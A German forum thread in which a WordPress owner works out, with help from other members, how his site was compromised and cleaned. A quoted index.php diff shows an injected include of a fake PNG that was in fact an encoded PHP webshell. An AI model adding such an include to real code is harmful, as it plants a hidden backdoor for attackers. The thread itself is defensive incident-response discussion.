Mein Wordpress gehackt?

Mofa-Killer

New Member
Hi zusammen,

Hab vor kurzem ne komische Mail bekommen. Hier mal der Auszug:
Hello, dear webmaster.
I just found that your site http://www.bm-modding.de/ has been hacked and the harmful content has been uploaded (like here - http://www.bm-modding.de/custom-essay-writing/).
Please, delete it. Also check the whole site for the same vulnerabilities and repair them.
Hope that helps.
Ich hab das ganze WP (Dateien und auch im WP-Admin) durchsucht und nicht ansatzweise was gefunden, wie ich das Entfernen kann. Auch über Google nix gefunden, was helfen könnte.
Die Seite läuft auf einem Root mit Debian und Nginx als Webserver.
Auf dem Root sind noch 2 weitere WP Installationen, aber bei denen funktioniert der Link nicht.

Hoffe ihr könnt mir helfen.

MfG
 

MadMakz

Member
Als erstes würde ich einen Export + DB-Backup eines Contents vorschlagen.
Danach z.B. https://wordpress.org/plugins/wordfence/ installieren und laufen lassen.

Alle Orner und htaccess prüfen. Wenn du die Möglichkeit hast siehe auch Serverlogs nach möglichen Pfaden sowie in den vHosts nach.
Im HTML sind keine Wordpress referenzen zu finden und scheint auf den ersten Blick daher statisches Bootstrap/HTML zu sein. Irgendwo müssen diese (auf den ersten Blick entdecke ich elf solcher Seiten) referenziert sein.
Rekurisve suche nach z.B. "Custom essay writing" und "custom-essay-writing" könnten die Sache beschleunigen.

Danach versuchen heraus zu finden wie dies möglich war.
 
Last edited by a moderator:

Mofa-Killer

New Member
Wordfence hat geholfen.
index.php, wp-config-sample.php (gleich gelöscht) und noch irgendeine PHP-Datei waren verändert.
Konnte nix genaues erkennen, was irgendwie drauf hinweisen könnte.
Die Suche nach den Begriffen hatte ich versucht. Sowohl normal als auch rekursive. Gab aber nichts aufschlussreiches.
HTML Quelltext auch durchsucht, aber auch dort keinen Hinweis gefunden.

Vielen Dank für die schnelle Hilfe.
 
Last edited by a moderator:

marce

Well-Known Member
Hast Du auch Maßnahmen ergriffen, daß derlei nicht wieder geschehen kann? Nur Symptome beseitigen hilft nicht, solange das Einfallstor noch existent ist.
 

PHP-Friends

Blog Benutzer
Üblicherweise sind bei WordPress dubiose oder veraltete Plugins schuld. WP selbst wird eigentlich "nie" gehackt, da es seit Ewigkeiten automatische Updates durchführt. Aber gehackte Webseiten wegen komplett mit Plugins zugeballerten WP-Instanzen haben wir täglich...

Mithilfe des access.log kommt man oftmals schon weiter.
 

Mofa-Killer

New Member
Über Wordfence konnte ich auch sehen, das jemand im 5 Minuten Takt auf den "admin"-Account will. Der User "admin" existiert bei mir nicht, da es ja der Standardaccount ist.

Plugin's sind nicht viele, aber weitesgehend aktuell. Deswegen ist mir auch ein Rätsel, wie es dazu kommen konnte. Wenn man nicht weiß durch welche Lücke, derjenige ist kann man diese schlecht schließen.

MfG
 
Last edited by a moderator:

PHP-Friends

Blog Benutzer
Du könntest noch sicherheitshalber etwaige FTP-Passwörter ändern.

Um Bruteforce auf Admin-Accounts muss man nichts geben (wenngleich diese bei WordPress immense Last bedeuten). Vernünftige Passwörter sind remote de facto nicht knackbar, erst recht nicht per HTTP.
 

marce

Well-Known Member
Plugin's sind nicht viele, aber weitesgehend aktuell. Deswegen ist mir auch ein Rätsel, wie es dazu kommen konnte. Wenn man nicht weiß durch welche Lücke, derjenige ist kann man diese schlecht schließen.
... ich habe den evtl. relevanten Teil mal markiert.

in letzter Zeit auch gerne genommen: Lücken in Themes.

... und dann gilt natürlich auch immer: Nur, daß ein Plugin aktuell ist heißt noch lange nicht, daß es sicher ist. Es gibt auch aktuelle, gern genutzte Plugins auf einem Softwarestand von 2010, die von keiner Sau mehr betreut werden. Da will ich gar nicht wissen, wie da der Security-Stand ist.

... und dann gibt's halt je nach Konfiguration einfach auch noch schwache User-Passoworte und wenn man mal Redakteur ist, kann man meist auch schon viel zu viel.
 

Mofa-Killer

New Member
Aktuell wieder ein kleines Problem. Die index.php wird immer wieder verändert.

Original:
PHP:
<?php

/**
* Front to the WordPress application. This file doesn't do anything, but loads 
* wp-blog-header.php which does and tells WordPress to load the theme.
Verändert:
PHP:
<?php 
include_once('wp-admin/includes/pin.png');
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
Ich verstehe den Sinn hinter dieser Änderung nicht. Es ist ja nur eine PNG Datei.

MfG
 

Eve

New Member
Ich verstehe den Sinn hinter dieser Änderung nicht. Es ist ja nur eine PNG Datei.
JPG/PNG Injekt?.

Schau mal hier - https://www.exploit-db.com/search/?action=search&description=wordpress&e_author= Solltes du einer der dort gelisteten Erweiterungen nutzen dürfte die Ursache geklärt sein besonders Slider & Galerien sind extrem verwundbar. ggf. provisorisch chmod rechte anpassen auch wenn ggf. Funktionen nicht mehr richtig funktionieren bis du endlich mal eine Lösung hast. Kann für dich auch juristisch ärger bedeuten wenn du Kenntnis über eine vorhandene Lücke hast & sie nicht beseitigst.

Cia
 
Last edited by a moderator:

nexus

Active Member
JPG/PNG Injekt?
Natürlich!
PHP-include fügt Programmcode in das aufrufende Script ein (wäre auch sinnfrei, eine 'echte' Bilddatei in den Scriptcode zu inkludieren).

Der TO beschränkt sich offenbar nur auf Symptombeseitigung und kann mangels ausreichender Kenntnisse (das läßt zumindest die Fragestellung bezüglich des PNG-Files vermuten) nicht die Sicherheitslücken finden und schließen.
Er sollte sich nach professioneller Hilfe umschauen, um seine Installation wieder sauber und danach auch sicher zu bekommen.
 

GwenDragon

Registered User
@Mofa-Killer
Bei einem Include wird die zu ladende Datei interpretiert und ausgeführt.
Un wenn in der "Bilddatei" irgendwo PHP-Code drin ist, dann knallts.
 

marce

Well-Known Member
Prüfe den Timestamp der modifizierten PHP-Datei und gleiche diesen mit deinem access.log ab.
Je nach Exploit leider evtl. nicht hilfreich - bei uns hat's auch mal ein WP erwischt, da war im Exploit auch ein Timestamp-Setzen der Datei drin.
 

Mofa-Killer

New Member
Ich wollte mal einen aktuellen Stand mitteilen.

Die PNG Datei, war an sich eine PHP Datei. Der Code war an sich verschlüsselt, konnte man aber mittels nen Online Decoder wieder entschlüsseln. Daraus konnte man denn sehen das es sich um das WebShell 2.5 handelt.
Danach sämtliche Ordner durchforstet und immer mit einer WP Zip Verglichen. Bis dann alles wieder stimmte. Es war alles im pomo Ordner versteckt.
Nachdem alles gelöscht ist und 3 ungenutzte Plugin's entfernt wurden, gabs seit einigen Tagen keine Meldungen mehr im Wordfence.
In der MySQL Datenbank war auch nichts vom WebShell zu finden. Da der sich laut Recherche auch da einnistet.

@PHP-Friends Es gab keinen Eintrag in der Access.log bei dem Timestamp.

MfG
 

Craft

New Member
Welche Plugins waren denn Deiner Meinung nach die Übeltäter? Und wie aktuell waren sie zu dem Zeitpunkt?
 
Top